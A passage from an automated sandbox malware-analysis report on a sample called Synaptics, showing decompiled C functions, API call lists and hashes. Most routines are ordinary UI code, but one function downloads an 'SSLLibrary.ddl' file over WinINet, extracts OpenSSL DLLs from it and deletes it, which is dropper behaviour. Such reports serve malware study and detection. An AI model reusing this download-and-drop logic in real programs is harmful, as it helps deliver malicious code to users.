                                                                                                                                                                                                                            					_t61 = 0;
                                                                                                                                                                                                                            					if(_a12 == 0) {
                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                            						return _t61;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v32.left = 0;
                                                                                                                                                                                                                            					_v32.top = 0;
                                                                                                                                                                                                                            					_v32.right = GetSystemMetrics(0);
                                                                                                                                                                                                                            					_v32.bottom = GetSystemMetrics(1);
                                                                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                                                                            						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                            							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t61 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v16 = GetClipBox(_t65,  &_v48);
                                                                                                                                                                                                                            					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                                                                                                                                                                            					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                                                                                                                                                                            						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_v16 == 1) {
                                                                                                                                                                                                                            							_t61 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
                                                                                                                                                                                                                            				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                                                                                                                                                                            				goto L14;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb49
                                                                                                                                                                                                                            0x0042cb61
                                                                                                                                                                                                                            0x0042cb77
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb7d
                                                                                                                                                                                                                            0x0042cb7f
                                                                                                                                                                                                                            0x0042cb7f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb61
                                                                                                                                                                                                                            0x0042cad2
                                                                                                                                                                                                                            0x0042cae7
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB06
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB11
                                                                                                                                                                                                                            • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                                                                                                                                                                                            • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB5A
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB70
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                                                                                                            • String ID: EnumDisplayMonitors
                                                                                                                                                                                                                            • API String ID: 362875416-2491903729
                                                                                                                                                                                                                            • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                            			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				short _v22;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				struct HWND__* _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t125 = __esi;
                                                                                                                                                                                                                            				_t124 = __edi;
                                                                                                                                                                                                                            				_t105 = __ebx;
                                                                                                                                                                                                                            				_t127 = _t128;
                                                                                                                                                                                                                            				_t129 = _t128 + 0xffffffe0;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x45750c);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t129;
                                                                                                                                                                                                                            				E004397DC();
                                                                                                                                                                                                                            				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                                                                                                                                                            					_t50 =  *0x49da70; // 0x422f48
                                                                                                                                                                                                                            					E00406A70(_t50,  &_v36);
                                                                                                                                                                                                                            					E0040D144(_v36, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(GetCapture() != 0) {
                                                                                                                                                                                                                            					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				ReleaseCapture();
                                                                                                                                                                                                                            				_t56 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            				E004596E4(_t56);
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x4574ef);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t129;
                                                                                                                                                                                                                            				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                                                                                                                                                                                                            				_v32 = GetActiveWindow();
                                                                                                                                                                                                                            				_t60 =  *0x49be70; // 0x0
                                                                                                                                                                                                                            				_v20 = _t60;
                                                                                                                                                                                                                            				_t61 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				_t20 = _t61 + 0x78; // 0x0
                                                                                                                                                                                                                            				_t62 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				_t21 = _t62 + 0x7c; // 0x21e1564
                                                                                                                                                                                                                            				E0041ACE8( *_t21,  *_t20, 0);
                                                                                                                                                                                                                            				_t65 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                                                                                                                                                                                                            				_t66 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				_t24 = _t66 + 0x44; // 0x0
                                                                                                                                                                                                                            				_v22 =  *_t24;
                                                                                                                                                                                                                            				_t68 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				E00458714(_t68,  *_t20, 0);
                                                                                                                                                                                                                            				_t70 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				_t26 = _t70 + 0x48; // 0x0
                                                                                                                                                                                                                            				_v28 =  *_t26;
                                                                                                                                                                                                                            				_v16 = E00451600(0, _t105, _t124, _t125);
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x4574cd);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t129;
                                                                                                                                                                                                                            				E00457194(_v8);
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x45742c);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t129;
                                                                                                                                                                                                                            				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_t80 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            					E0045A580(_t80, _t124, _t125);
                                                                                                                                                                                                                            					_t82 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            					if( *((char*)(_t82 + 0x9c)) == 0) {
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                                                                                                                                                                                            							E004570F4(_v8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                                                                                                                                                                                                            				} while (_t85 == 0);
                                                                                                                                                                                                                            				_v12 = _t85;
                                                                                                                                                                                                                            				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
                                                                                                                                                                                                                            				_t90 = E00441704(_v8);
                                                                                                                                                                                                                            				if(_t90 != GetActiveWindow()) {
                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t122);
                                                                                                                                                                                                                            				 *[fs:eax] = _t122;
                                                                                                                                                                                                                            				_push(0x457433);
                                                                                                                                                                                                                            				return E0045718C();
                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCapture.USER32 ref: 004572B5
                                                                                                                                                                                                                            • GetCapture.USER32 ref: 004572C4
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                                                                                                                                                                                            • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 004572F6
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 00457408
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                            • String ID: H/B
                                                                                                                                                                                                                            • API String ID: 862346643-184950203
                                                                                                                                                                                                                            • Opcode ID: 566df20a72b61cb5c56fc7dfe32d7b76f6e3c22f5e7dbfb110a8999abcf3f90f
                                                                                                                                                                                                                            • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 566df20a72b61cb5c56fc7dfe32d7b76f6e3c22f5e7dbfb110a8999abcf3f90f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                            			E00495084(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t82;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                                                                            				_push(0x4951d4);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t87;
                                                                                                                                                                                                                            				_t84 = 3;
                                                                                                                                                                                                                            				_t55 = 0x49f0f4;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					if( *_t55 == 0) {
                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t68 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
                                                                                                                                                                                                                            						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
                                                                                                                                                                                                                            							_v5 = 0;
                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v5 = 1;
                                                                                                                                                                                                                            							_t72 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
                                                                                                                                                                                                                            							_t82 = LoadLibraryA(E00404E80(_v16));
                                                                                                                                                                                                                            							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
                                                                                                                                                                                                                            							_t74 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v20, "\\libeay32.dll", _t74);
                                                                                                                                                                                                                            							E0041DD9C(_t30, _t56, _v20, _t82);
                                                                                                                                                                                                                            							E00403BEC(_t56);
                                                                                                                                                                                                                            							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
                                                                                                                                                                                                                            							_t8 =  &_v24; // 0x495430
                                                                                                                                                                                                                            							_t77 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC(_t8, "\\ssleay32.dll", _t77);
                                                                                                                                                                                                                            							_t9 =  &_v24; // 0x495430
                                                                                                                                                                                                                            							E0041DD9C(_t38, _t57,  *_t9, _t82);
                                                                                                                                                                                                                            							E00403BEC(_t57);
                                                                                                                                                                                                                            							FreeLibrary(_t82);
                                                                                                                                                                                                                            							_t79 =  *0x49f100; // 0x0
                                                                                                                                                                                                                            							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
                                                                                                                                                                                                                            							E00404BB8( &_v28, E00404E80(_v32));
                                                                                                                                                                                                                            							E00409BAC(_v28);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					_t55 = _t55 + 4;
                                                                                                                                                                                                                            					_t84 = _t84 - 1;
                                                                                                                                                                                                                            				} while (_t84 != 0);
                                                                                                                                                                                                                            				_pop(_t70);
                                                                                                                                                                                                                            				 *[fs:eax] = _t70;
                                                                                                                                                                                                                            				_push(0x4951db);
                                                                                                                                                                                                                            				return E004049E4( &_v32, 6);
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            0x004951a4
                                                                                                                                                                                                                            0x004951a4
                                                                                                                                                                                                                            0x004950d3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004951af
                                                                                                                                                                                                                            0x004951af
                                                                                                                                                                                                                            0x004951b2
                                                                                                                                                                                                                            0x004951b2
                                                                                                                                                                                                                            0x004951bb
                                                                                                                                                                                                                            0x004951be
                                                                                                                                                                                                                            0x004951c1
                                                                                                                                                                                                                            0x004951d3

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenUrlA.WININET(00000001,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0049528F), ref: 004950F9
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                                                                                                                                                                                              • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,?,0047618D,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C,00000000,00000000,00000000), ref: 00409BB7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                                                                                                                                                                                            • String ID: 0TI$LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 1893608559-2441048562
                                                                                                                                                                                                                            • Opcode ID: 47dd40e21aa0a6f8e1a77457fa91ad782175ad0839c593cb5f4cff04c075f9e5
                                                                                                                                                                                                                            • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47dd40e21aa0a6f8e1a77457fa91ad782175ad0839c593cb5f4cff04c075f9e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040D058(void* __edx, void* __edi, void* __fp0) {
                                                                                                                                                                                                                            				void _v1024;
                                                                                                                                                                                                                            				char _v1088;
                                                                                                                                                                                                                            				long _v1092;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                                                                                                                                                                                            				_t14 =  *0x49dc84; // 0x49e04c
                                                                                                                                                                                                                            				if( *_t14 == 0) {
                                                                                                                                                                                                                            					_t16 =  *0x49d864; // 0x407db4
                                                                                                                                                                                                                            					_t9 = _t16 + 4; // 0xffd2
                                                                                                                                                                                                                            					_t18 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
                                                                                                                                                                                                                            					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t24 =  *0x49d8f8; // 0x49e21c
                                                                                                                                                                                                                            				E004028C4(E00402FCC(_t24));
                                                                                                                                                                                                                            				CharToOemA( &_v1024,  &_v1024);
                                                                                                                                                                                                                            				_t32 = E00409F88( &_v1024, __edi);
                                                                                                                                                                                                                            				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                                                                                                                                                                                            				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            • CharToOemA.USER32 ref: 0040D08F
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040D0EF
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0040D105
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                            • String ID: LI
                                                                                                                                                                                                                            • API String ID: 185507032-1163166679
                                                                                                                                                                                                                            • Opcode ID: f6bc0104282aee26a15ec115454dfc7b83621b846d046f711f500fdc59f8e865
                                                                                                                                                                                                                            • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6bc0104282aee26a15ec115454dfc7b83621b846d046f711f500fdc59f8e865
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
                                                                                                                                                                                                                            				char _t62;
                                                                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                            				signed char _t107;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            				int _t117;
                                                                                                                                                                                                                            				intOrPtr* _t118;
                                                                                                                                                                                                                            				int _t119;
                                                                                                                                                                                                                            				int* _t121;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *_t121 = __ecx;
                                                                                                                                                                                                                            				_t117 = __edx;
                                                                                                                                                                                                                            				_t118 = __eax;
                                                                                                                                                                                                                            				if(__edx ==  *_t121) {
                                                                                                                                                                                                                            					L29:
                                                                                                                                                                                                                            					_t62 =  *0x43ad44; // 0x0
                                                                                                                                                                                                                            					 *((char*)(_t118 + 0x98)) = _t62;
                                                                                                                                                                                                                            					return _t62;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                                                                                                                                                                            					_t107 =  *0x43ad3c; // 0x1f
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((_t107 & 0x00000001) == 0) {
                                                                                                                                                                                                                            					_t119 =  *(_t118 + 0x40);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((_t107 & 0x00000002) == 0) {
                                                                                                                                                                                                                            					_t121[1] =  *(_t118 + 0x44);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                                                                                                                                                                                            					_t64 =  *(_t118 + 0x48);
                                                                                                                                                                                                                            					_t121[2] = _t64;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if((_t107 & 0x00000001) == 0) {
                                                                                                                                                                                                                            						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                                                                                                                                                                                            						_t121[2] = _t64;
                                                                                                                                                                                                                            					} else {
